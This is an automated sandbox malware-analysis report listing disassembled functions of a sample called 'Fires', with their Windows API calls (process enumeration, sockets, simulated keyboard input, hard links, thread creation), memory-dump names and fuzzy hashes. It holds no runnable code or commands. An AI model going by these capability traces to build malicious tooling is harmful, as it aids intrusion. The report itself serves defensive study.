CreateToolhelp32Snapshot.KERNEL32 ref: 00DCB10C
Process32FirstW.KERNEL32(00000000,?), ref: 00DCB11A

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Process32NextW.KERNEL32(00000000,?), ref: 00DCB1FC
CloseHandle.KERNEL32(00000000), ref: 00DCB20B

Part of subcall function 00D5E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D84D73,?), ref: 00D5E395

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 31da01af73310fe7d23e59b4d824f8613fa9c4fe70a679b8ac76c7b16a6793ff
Instruction ID: a593143ab2b01afcc9c067d2d8ed8a392deba9e8375ea1f8302f49eb126fed37
Opcode Fuzzy Hash: 31da01af73310fe7d23e59b4d824f8613fa9c4fe70a679b8ac76c7b16a6793ff
Instruction Fuzzy Hash: 35512B71908301AFD710EF24C886A6BBBE8FF99754F40492EF98997251DB71D904CBB2

Function 00D81711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D81840

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b2fd09ef8709508ba4ff1e19da76c9efe298a1c6808dd04007326d3af5fc67ad
Instruction ID: 3122b43e62c7d7c418025bf82f9f42aad15c595ecad339c6e46c88f4b96f53c1
Opcode Fuzzy Hash: b2fd09ef8709508ba4ff1e19da76c9efe298a1c6808dd04007326d3af5fc67ad
Instruction Fuzzy Hash: 8241183AA00510BBDB257BFDDC43ABE3ABCEF45730F184629F418D6291E675884A47B1

Function 00DC2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00DC255A
WSAGetLastError.WSOCK32 ref: 00DC2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DC25E7
WSAGetLastError.WSOCK32 ref: 00DC25F1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: a069342ed16957e4ddae3b86cfbcbed45d975c60e35308da4ca369c68b8d404e
Instruction ID: 9fde80ec37e55c0e951952e246d1b82c2cbb56a9d8aed1fbae8bf2eb5691a549
Opcode Fuzzy Hash: a069342ed16957e4ddae3b86cfbcbed45d975c60e35308da4ca369c68b8d404e
Instruction Fuzzy Hash: 1441A174A40201AFE721AF24C886F2A77A5EB44754F58C45CF95A8F2D2D772ED428BB0

Function 00DD6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DD6D1A
ScreenToClient.USER32(?,?), ref: 00DD6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DD6DBA

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: c641a1b0946a375ff9c93bdcc9d01cb1cf1b6b52fd57c7960f2880d954ba0b1f
Instruction ID: a962bb498397b310f5bcecbbbf07b64b91fa7aebbbe8d8e53354b6c87b960234
Opcode Fuzzy Hash: c641a1b0946a375ff9c93bdcc9d01cb1cf1b6b52fd57c7960f2880d954ba0b1f
Instruction Fuzzy Hash: 0C510A74A01209AFCF24DF68D8809AE7BB6FB94320F14815AF9559B390D730ED91CBA0

Function 00D7B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbcd17d6709dbece1dfdea4e46b03402606d18a8eaa5ce1af38b7029e240559e
Instruction ID: ce72428732bf7a883dba5c4f424e73d214abfab6257dea663d81c7e8b994ab5a
Opcode Fuzzy Hash: cbcd17d6709dbece1dfdea4e46b03402606d18a8eaa5ce1af38b7029e240559e
Instruction Fuzzy Hash: 8F41B471A00744AFD725AF78CC41BAABBEDEB88720F10C52EF159DB291E771990187B1

Function 00DB611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DB61C8
GetLastError.KERNEL32(?,00000000), ref: 00DB61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DB6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DB623F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 36b0ccb0ad2344bdbc24cfbdbe194627483123554958f8a4abc2fb125fc80811
Instruction ID: 7a3476118b6d050298647131da3f48ef624a81f1dddb508887d3044d42d0b261
Opcode Fuzzy Hash: 36b0ccb0ad2344bdbc24cfbdbe194627483123554958f8a4abc2fb125fc80811
Instruction Fuzzy Hash: C1413835600610DFCB20EF15C585A5EBBE2EF89710B198498E84AAB362CB35FC01DFB1

Function 00DAB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DAB473
SetKeyboardState.USER32(00000080), ref: 00DAB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DAB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DAB54F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4af576f83382d9f0fd31e5163b496d276c9dab9194ba001843dac294de40f680
Instruction ID: 0f531f43c4e854ff5d3f7a15a3a2c770b87f89be58a831e852837722e5f877d4
Opcode Fuzzy Hash: 4af576f83382d9f0fd31e5163b496d276c9dab9194ba001843dac294de40f680
Instruction Fuzzy Hash: 7231F670A407486EFF318A2598057FA7BB6AB4B334F08421BE496961D7C3B5C98787B1

Function 00DAB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00DAB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00DAB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00DAB63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00DAB68D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2b86bf2a12cbc6a9e8603c7d4cc5cd44d90e635f53f14232006343b116b37416
Instruction ID: 425f05a7d2b832badf0f505021078fceefa9d318bbbb713d942dd5ecbf5681d5
Opcode Fuzzy Hash: 2b86bf2a12cbc6a9e8603c7d4cc5cd44d90e635f53f14232006343b116b37416
Instruction Fuzzy Hash: 8731CA309406586EFF248B6588057FA7BA6FB96330F0C422BE4859A1D2C775C9578BB1

Function 00DD80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DD80D4
GetWindowRect.USER32(?,?), ref: 00DD814A
PtInRect.USER32(?,?,?), ref: 00DD815A
MessageBeep.USER32(00000000), ref: 00DD81C6

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: bb9d1c69033c2326241ff62e92da0679f456656a035b1e57b01c543da450016e
Instruction ID: 66abca288021a90f7fec286e24a31286e130dcbb482f09b92042594442601e34
Opcode Fuzzy Hash: bb9d1c69033c2326241ff62e92da0679f456656a035b1e57b01c543da450016e
Instruction Fuzzy Hash: AA419230A01315DFCB12DF59CC84AA9B7F5FF49310F1880AAEA549B361CB30E94ADB60

Function 00DD2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00DD2187

Part of subcall function 00DA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA43AD
Part of subcall function 00DA4393: GetCurrentThreadId.KERNEL32 ref: 00DA43B4
Part of subcall function 00DA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DA2F00), ref: 00DA43BB

GetCaretPos.USER32(?), ref: 00DD219B
ClientToScreen.USER32(00000000,?), ref: 00DD21E8
GetForegroundWindow.USER32 ref: 00DD21EE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: fb7f1fa6066e8c98bd51b63325bf525876db1700ff33f495813a0e70fe050783
Instruction ID: 720f82b0e2b7a7ee55ddc8aba4980adfa2beba469a7779058f144cb9bd52ebc7
Opcode Fuzzy Hash: fb7f1fa6066e8c98bd51b63325bf525876db1700ff33f495813a0e70fe050783
Instruction Fuzzy Hash: DF311271D01209AFCB04EFA5C881CAEB7F9EF59304B5484AAE455E7311D6719E45CBB0

Function 00DAE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00D441EA: _wcslen.LIBCMT ref: 00D441EF

_wcslen.LIBCMT ref: 00DAE8E2
_wcslen.LIBCMT ref: 00DAE8F9
_wcslen.LIBCMT ref: 00DAE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00DAE92F

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 782368afc714716835c2495dce368004afcad902009b7a1724a247a407a098ed
Instruction ID: 6004f1350c94e3376e150a60f205c01e5628e2d916c4cb47e5408f1a0f1ab8f7
Opcode Fuzzy Hash: 782368afc714716835c2495dce368004afcad902009b7a1724a247a407a098ed
Instruction Fuzzy Hash: CC21B271D00318AFCB10AFA8D982BAEBBF8EF56350F154065E904BB381D6749E41CBB1

Function 00DD321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00DD32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DD32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DD32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DD32DC

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: e9f4446a996f9286c101a872885e3d311927eeb21a6f0182063a48ca4bd91cfa
Instruction ID: 320772099bdd24d3803da151faddecdedc4d0a0302d068f4d953a31ec4735016
Opcode Fuzzy Hash: e9f4446a996f9286c101a872885e3d311927eeb21a6f0182063a48ca4bd91cfa
Instruction Fuzzy Hash: 7A21AE31605111AFD7149B24CC45F6ABBA9EF81324F28825AF8668B392C771ED41CBF5

Function 00DA825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DA8271,?,000000FF,?,00DA90BB,00000000,?,0000001C,?,?), ref: 00DA96F3
Part of subcall function 00DA96E4: lstrcpyW.KERNEL32(00000000,?,?,00DA8271,?,000000FF,?,00DA90BB,00000000,?,0000001C,?,?,00000000), ref: 00DA9719
Part of subcall function 00DA96E4: lstrcmpiW.KERNEL32(00000000,?,00DA8271,?,000000FF,?,00DA90BB,00000000,?,0000001C,?,?), ref: 00DA974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DA90BB,00000000,?,0000001C,?,?,00000000), ref: 00DA828A
lstrcpyW.KERNEL32(00000000,?,?,00DA90BB,00000000,?,0000001C,?,?,00000000), ref: 00DA82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00DA90BB,00000000,?,0000001C,?,?,00000000), ref: 00DA82EB

Strings

cdecl, xrefs: 00DA82E2

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d3e3affa343113359f9383fd7e735d9558fb2285d0f7cdddcfff817909559bef
Instruction ID: 9673d5ac2c7b40df7ad721e1912d37b77c7c9963b304cb9d32051387d4cc2fe2
Opcode Fuzzy Hash: d3e3affa343113359f9383fd7e735d9558fb2285d0f7cdddcfff817909559bef
Instruction Fuzzy Hash: 2B11D37A200342ABCF149F38D845E7A7BA9FF46750B54402AFD42C7290EF319811D7B4

Function 00DD60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00DD615A
_wcslen.LIBCMT ref: 00DD616C
_wcslen.LIBCMT ref: 00DD6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DD62B5

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: e36d16641e75bcaaea02d13bbd103fc6f4900d0d860236dc92355b47b230fe5e
Instruction ID: 0bb55954ffbe4a047147cbbe7596ac62efd9c431cdcc43aeae45b1d807ee6271
Opcode Fuzzy Hash: e36d16641e75bcaaea02d13bbd103fc6f4900d0d860236dc92355b47b230fe5e
Instruction Fuzzy Hash: 1F118175500218AAEB10DFA5DC84AEE77ACEF11354B18416BFA11D6286E770C944CBB0

Function 00D72079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b3f7fafc84f6d804cb7659d846388d34e8f4dead660e22387f89c04613ba1b
Instruction ID: 151389765834dbfa210b6a00faadf2c46a348670c05ecc2a0a2564c9240acbdf
Opcode Fuzzy Hash: d8b3f7fafc84f6d804cb7659d846388d34e8f4dead660e22387f89c04613ba1b
Instruction Fuzzy Hash: E3014FB26052967EEA3126786CC1F77671EDF413B8B349729B529A11D1FA708D409170

Function 00DA2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00DA2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DA23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DA23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DA23D7

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0ef0b203891e376392b249107a5de8e3980ace1f3d724a359b0c0638d1ae95c7
Instruction ID: 4cc390fa3121b1cc18ea6914e1b89d9e8883eaad45092c75709281e18e417bd5
Opcode Fuzzy Hash: 0ef0b203891e376392b249107a5de8e3980ace1f3d724a359b0c0638d1ae95c7
Instruction Fuzzy Hash: 3F110C36901218FFDF119B99CD85FADBBB8FB09750F200095E601B7290D6716E10DBA4

Function 00DAEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DAEB14
MessageBoxW.USER32(?,?,?,?), ref: 00DAEB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DAEB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DAEB64

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 4123b82a4531b6000be34e2348537cd97d387f84d459db0742fe779073c23553
Instruction ID: f44629405709afadc60b3f52f5e3c4b6d831cdab52ee86b9db697fcf97b008bf
Opcode Fuzzy Hash: 4123b82a4531b6000be34e2348537cd97d387f84d459db0742fe779073c23553
Instruction Fuzzy Hash: 2911C876901319BFCB019FA89C09ADA7FADEB46310F14825AF926E3390D674C90887B1

Function 00D6D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00D6D369,00000000,00000004,00000000), ref: 00D6D588
GetLastError.KERNEL32 ref: 00D6D594
__dosmaperr.LIBCMT ref: 00D6D59B
ResumeThread.KERNEL32(00000000), ref: 00D6D5B9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f677001dfc498580fe736b163bd859addcdd3e151733417c0e2f6053c62a55d9
Instruction ID: c6d3a3a9d1317c05ea912f68b95ceaf6dc7496edc8af9383e1736c96d42d03da
Opcode Fuzzy Hash: f677001dfc498580fe736b163bd859addcdd3e151733417c0e2f6053c62a55d9
